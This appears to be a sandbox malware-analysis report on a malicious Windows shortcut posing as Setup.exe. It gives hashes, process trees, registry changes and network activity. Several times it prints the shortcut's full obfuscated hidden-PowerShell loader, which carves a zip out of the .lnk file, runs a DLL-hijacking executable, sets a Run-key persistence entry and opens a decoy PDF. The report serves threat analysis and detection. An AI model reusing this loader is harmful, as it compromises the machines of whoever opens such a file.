File name: Setup.exe

Full analysis: https://app.any.run/tasks/15b45814-09ca-42b1-886f-3e4fa15db58a
Verdict: Malicious activity
Analysis date: March 15, 2024, 09:17:32
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Has Description string, Has command line arguments, Icon number=13, ctime=Mon Jan 1 00:00:00 1601, mtime=Mon Jan 1 00:00:00 1601, atime=Mon Jan 1 00:00:00 1601, length=0, window=hidenormalshowminimized
MD5: 8E37E230E3707CED709DC00DCBFD2ABF
SHA1: 06D311A6DB6CA9A6BCF15630BE7E9C6CE8098DA4
SHA256: 2D83B80D9645B3A871FA5BEE4FF74E47926E053A4B64F15ED1725E89D2099B5B
SSDEEP: 3072:tMGwx6nZ7tKPUqDnr06tMThIKLHuxJAXjEVvQwmJnjF/09bV2h/QsaUV7ZTphvCu:hnZ7IUqfrMnLOQXwQwcT6Wd1hvCaVt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Run PowerShell with an invisible window
      • powershell.exe (PID: 1912)
    • The DLL Hijacking
      • Setup.exe (PID: 3532)
    • Drops the executable file immediately after the start
      • powershell.exe (PID: 1912)
      • Setup.exe (PID: 3532)
    • Changes the autorun value in the registry
      • Setup.exe (PID: 3532)
  • SUSPICIOUS
    • Starts CMD.EXE for commands execution
      • conhost.exe (PID: 1404)
    • PowerShell delay command usage (probably sleep evasion)
      • powershell.exe (PID: 1912)
    • Process drops legitimate windows executable
      • powershell.exe (PID: 1912)
      • Setup.exe (PID: 3532)
    • Starts a Microsoft application from unusual location
      • Setup.exe (PID: 3532)
    • Executable content was dropped or overwritten
      • powershell.exe (PID: 1912)
      • Setup.exe (PID: 3532)
    • Starts POWERSHELL.EXE for commands execution
      • cmd.exe (PID: 1192)
    • Reads security settings of Internet Explorer
      • Setup.exe (PID: 3532)
    • Creates file in the systems drive root
      • Acrobat.exe (PID: 6360)
      • Acrobat.exe (PID: 6592)
  • INFO
    • Checks supported languages
      • Setup.exe (PID: 3532)
      • acrobat_sl.exe (PID: 6324)
    • Reads the computer name
      • Setup.exe (PID: 3532)
    • The executable file from the user directory is run by the Powershell process
      • Setup.exe (PID: 3532)
    • Application launched itself
      • Acrobat.exe (PID: 6360)
      • AcroCEF.exe (PID: 2012)
    • Checks proxy server information
      • Setup.exe (PID: 3532)
    • Executable content was dropped or overwritten
      • AdobeARM.exe (PID: 4272)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX in the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: Description, CommandArgs, IconFile, Unicode, ExpString, PreferEnvPath
FileAttributes: (none)
TargetFileSize: -
IconIndex: 13
RunWindow: Show Minimized No Activate
HotKey: (none)
Description: Type: Text Document Size: 391,2KB KB Date modified: 30/11/2024 14:56
CommandLineArguments: --headless cmd /c p^o^w^e^r^s^h^e^l^l -w^i^n^d^o^w^s^t^y^l^e h^i^d^d^e^n Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk ^| Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk ^| where-object {$_.length -eq 00196182} ^| Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = '%TMP%\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force ^| Out-Null;^& .\Setup.exe;^& .\*.pdf
IconFileName: %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe
All screenshots are available in the full report
Total processes: 150
Monitored processes: 20
Malicious processes: 3
Suspicious processes: 1

Behavior graph (interactive in the full report); processes shown, in order: conhost.exe, cmd.exe, powershell.exe, setup.exe, acrobat.exe (x2), acrocef.exe (x9), adobearm.exe, acrobat_sl.exe, acrocef.exe, slui.exe (x2)

Process information

Columns: PID, CMD, Path, Indicators, Parent process
PID: 1192
CMD: cmd /c p^o^w^e^r^s^h^e^l^l -w^i^n^d^o^w^s^t^y^l^e h^i^d^d^e^n Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk ^| Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk ^| where-object {$_.length -eq 00196182} ^| Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = 'C:\Users\admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force ^| Out-Null;^& .\Setup.exe;^& .\*.pdf
Path: C:\Windows\System32\cmd.exe
Parent process: conhost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
PID: 1404
CMD: "C:\WINDOWS\system32\conhost.exe" --headless cmd /c p^o^w^e^r^s^h^e^l^l -w^i^n^d^o^w^s^t^y^l^e h^i^d^d^e^n Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk ^| Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk ^| where-object {$_.length -eq 00196182} ^| Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = 'C:\Users\admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force ^| Out-Null;^& .\Setup.exe;^& .\*.pdf
Path: C:\Windows\System32\conhost.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1912
CMD: powershell -windowstyle hidden Start-Sleep 2;$23r23rf34 = Get-ChildItem -Path $env:TEMP -Recurse -File -Filter *.lnk | Select-Object -ExpandProperty FullName; if ($23r23rf34.Count -eq 0) {$23r23rf34 = Get-ChildItem -Path $MyInvocation.MyCommand.Path -Recurse -File -Filter *.lnk | where-object {$_.length -eq 00196182} | Select-Object -ExpandProperty FullName};$bkhfu093f = [system.io.file]::ReadAllBytes($23r23rf34);$fjhj3209fnd = 'C:\Users\admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$fjhj3209fnd = [Environment]::ExpandEnvironmentVariables($fjhj3209fnd);$obf_dir = [System.IO.Path]::GetDirectoryName($fjhj3209fnd);[System.IO.File]::WriteAllBytes($fjhj3209fnd, $bkhfu093f[004000..($bkhfu093f.length)]);cd $obf_dir;Expand-Archive -Path $fjhj3209fnd -DestinationPath . -EA SilentlyContinue -Force | Out-Null;Remove-Item -Path $fjhj3209fnd -EA SilentlyContinue -Force | Out-Null;& .\Setup.exe;& .\*.pdf
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID: 2012
CMD: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16514043
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process: Acrobat.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: LOW
Description: Adobe AcroCEF
Exit code: 0
Version: 23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 2432
CMD: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process: AcroCEF.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: LOW
Description: Adobe AcroCEF
Exit code: 0
Version: 23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 2720
CMD: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2136 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process: AcroCEF.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: LOW
Description: Adobe AcroCEF
Exit code: 0
Version: 23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 3052
CMD: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --first-renderer-process --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2400 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process: AcroCEF.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: LOW
Description: Adobe AcroCEF
Exit code: 0
Version: 23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 3532
CMD: "C:\Users\admin\AppData\Local\Temp\Setup.exe"
Path: C:\Users\admin\AppData\Local\Temp\Setup.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Device Census
Exit code: 0
Version: 10.0.19645.1016 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\setup.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\users\admin\appdata\local\temp\dcntel.dll
PID: 3816
CMD: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2584 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process: AcroCEF.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: LOW
Description: Adobe AcroCEF
Exit code: 0
Version: 23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 3868
CMD: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2600 --field-trial-handle=1608,i,13757917429717322905,3514257560968162680,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process: AcroCEF.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: LOW
Description: Adobe AcroCEF
Exit code: 0
Version: 23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
Total events: 36 834
Read events: 36 695
Write events: 136
Delete events: 3

Modification events

(PID) Process: (1912) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts
Operation: write
Name: Acrobat.Document.DC_.pdf
Value: 0

(PID) Process: (1912) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation: write
Name: Acrobat.Document.DC
Value:

(PID) Process: (1912) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

(PID) Process: (1912) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

(PID) Process: (1912) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

(PID) Process: (1912) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0

(PID) Process: (6360) Acrobat.exe
Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation: write
Name: DisplayName
Value: Adobe Acrobat Reader Protected Mode

(PID) Process: (3532) Setup.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: EdgeMicrosoft
Value: C:\Users\Public\Edge\MicrosoftEdgeUpdate.exe

(PID) Process: (6592) Acrobat.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation: write
Name: bLastExitNormal
Value: 0

(PID) Process: (6592) Acrobat.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation: write
Name: bSynchronizeOPL
Value: 0
Executable files: 5
Suspicious files: 128
Text files: 32
Unknown types: 33

Dropped files

PID | Process | Filename | Type
1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_a0iu3ads.gr1.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1912 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
  MD5: 94FF6F29E964D6A33A199D64D412BC35
  SHA256: 0C62D58DD47F1EA0C0A098A45E5DBE190B094C87472919D3A401895254193F77
6592 | Acrobat.exe | C:\USERS\ADMIN\APPDATA\LOCAL\ADOBE\ACROBAT\DC\SOPHIA\ACROBAT\SOPHIA.JSON | binary
  MD5: 79270D9595B259B53E39403366436A8E
  SHA256: AD0552A8B392315C512F6DC945F318AD83B98FB64415C0CED694843A3C5D2083
1912 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Setup.exe | executable
  MD5: D1B722A188C84E5059765FA87E8C5F32
  SHA256: 1041623963E1A109B80312CBFE4DC4544CBAC478C2EB2597CA040E1C78585A3E
6592 | Acrobat.exe | C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\ACROBAT_SBX\ACRONGLLOG.TXT | text
  MD5: E76040843F10E6ABE2422D4D38BCA97E
  SHA256: 9BCEAF5B9B999FF09A4D0410BE0A01E5DB313FC5C23084D4786DE6D3D6BE4D8B
1912 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | text
  MD5: F8EAA4B98C819E638E890A096F4ECF27
  SHA256: 9819008B53BCB574BA1533D381A5496ECF0B597A4826A48CE7A5F8BB99ABC8A6
6592 | Acrobat.exe | C:\Users\admin\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.1.20093.6 2024-03-15 09-17-52-501.log | text
  MD5: 084B0D9635A91FB971E8B38DCA71D5CF
  SHA256: B0B13A90981DF4A91512D3A2D86D693D7298F476F8B9022D8F8BD16AC25C375F
6592 | Acrobat.exe | C:\USERS\ADMIN\APPDATA\LOCAL\ADOBE\ACROBAT\DC\SHAREDDATAEVENTS | sqlite
  MD5: 138FF48CF99ABB957CB07D3C44918D71
  SHA256: 29078610DA7C3A129662CF431FD16C2DF60C7D644885DDB5A3272901C94CA0E4
2012 | AcroCEF.exe | C:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RFe2352.TMP | text
  MD5: FCD96552DAA6924F8C1E9C378163E2C9
  SHA256: E8EC8E1501E489B27B564C363F4E60963DD57180453B35B092A4B3769E7AA5CA
2012 | AcroCEF.exe | C:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old~RFe2381.TMP | text
  MD5: E26AF4B6A1AD62E54D67510EEFE20B2C
  SHA256: BF001234CF5F261254DEA1EA459BBFD4A35D15166C765CA3ED9B56D49A04BE1B
Download PCAP, analyze network streams, HTTP content and a lot more in the full report
HTTP(S) requests: 13
TCP/UDP connections: 43
DNS requests: 26
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
4272 | AdobeARM.exe | GET | 200 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/ReportOwner.txt | unknown | text | 4 b | unknown
4272 | AdobeARM.exe | GET | 404 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/2024/3/UC/Other.txt | unknown | html | 353 b | unknown
4272 | AdobeARM.exe | GET | 200 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/ProcessMAU.txt | unknown | text | 4 b | unknown
4272 | AdobeARM.exe | GET | 404 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/2024/3/OwnerAPI/Rdr.txt | unknown | html | 357 b | unknown
4272 | AdobeARM.exe | GET | 404 | 2.22.242.136:80 | http://acroipm2.adobe.com/assets/Owner/arm/11/adnme/NoValidReasonForAdnme.txt | unknown | html | 368 b | unknown
3996 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown
1088 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | binary | 314 b | unknown
3996 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown
4352 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D | unknown | binary | 471 b | unknown
6360 | Acrobat.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D | unknown | binary | 471 b | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4828 | svchost.exe | 239.255.255.250:1900 | - | - | - | unknown
3996 | svchost.exe | 20.190.160.17:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1280 | MoUsoCoreWorker.exe | 40.127.240.158:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
2720 | AcroCEF.exe | 23.43.60.134:443 | geo2.adobe.com | Akamai International B.V. | US | unknown
4272 | AdobeARM.exe | 2.22.242.136:80 | acroipm2.adobe.com | Akamai International B.V. | DE | unknown
5904 | svchost.exe | 88.221.124.138:443 | armmf.adobe.com | AKAMAI-AS | DE | unknown
2720 | AcroCEF.exe | 34.237.241.83:443 | p13n.adobe.io | AMAZON-AES | US | unknown
3996 | svchost.exe | 40.126.32.68:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown
3996 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted
1088 | backgroundTaskHost.exe | 2.19.96.19:443 | www.bing.com | Akamai International B.V. | DE | unknown

DNS requests

Domain | IP | Reputation
NGlzOiV5LX2wNWZvNyF.ns1.truecorps.co.th | - | unknown
IVEGH3IKFX3PI1wNHlwV.ns1.truecorps.co.th | - | unknown
geo2.adobe.com | 23.43.60.134 | whitelisted
acroipm2.adobe.com | 2.22.242.136, 2.22.242.130, 2.22.242.113, 2.22.242.123, 2.22.242.105, 2.22.242.121, 2.22.242.128, 2.22.242.137, 2.22.242.138, 104.124.11.64, 104.124.11.43 | whitelisted
armmf.adobe.com | 88.221.124.138 | whitelisted
p13n.adobe.io | 34.237.241.83, 18.213.11.84, 54.224.241.105, 50.16.47.176 | whitelisted
ocsp.digicert.com | 192.229.221.95 | whitelisted
IVEGH3IKFX3PI1wNHlwV.ns2.truecorps.co.th | - | unknown
www.bing.com | 2.19.96.19, 2.19.96.34, 2.19.96.9, 2.19.96.18, 2.19.96.16, 2.19.96.26, 2.19.96.115, 2.19.96.120, 2.19.96.123 | whitelisted
arc.msn.com | 20.103.156.88 | whitelisted

Threats

No threats detected
No debug info